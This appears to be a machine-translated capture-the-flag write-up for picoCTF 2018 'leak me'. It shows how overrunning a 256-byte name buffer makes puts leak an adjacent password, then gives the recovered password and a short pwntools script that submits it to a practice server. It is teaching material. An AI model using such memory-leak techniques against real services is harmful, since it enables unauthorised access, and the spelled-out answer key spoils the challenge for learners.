picoctf_2018_leak_me
step
- Routine inspection, 32-bit, nx protection is turned on
- Run locally to see the general situation
The approximate flow of the 32-bit ida loading program is to enter the name first, and then enter the password. There should be a password.txt on the target machine to check whether the input is correct. If the input is correct, the flag function will be called, and the flag function will print the flag. come out
- The position of the parameter v5 (storage name) and parameter s (storage flag) on the stack is not far away, and when the parameter v5 is read in data, the parameter s can be overwritten. The
difference between them0x154-0x54=0x100
, and the length of the data we input for v5 is exactly 0x100 , You can fill v5, followed by s, 34 lines in the main function will print v5, puts will stop when it encounters'\x00', and the content in v5 is now0x100*a+password+'\x00'*4c
, so the password will be printed along with it. come out.
Here I use cyclic to generate the string to read the password to
get the passworda_reAllY_s3cuRe_p4s$word_f85406
- Next, re-nc and enter the password
You don’t need to write exp at all for this question, but let’s write about it after reading the article.
from pwn import *
p = remote("node3.buuoj.cn",28171)
password = "a_reAllY_s3cuRe_p4s$word_f85406"
p.sendlineafter("What is your name?\n","A")
p.sendlineafter("Please Enter the Password.\n",password)
p.interactive()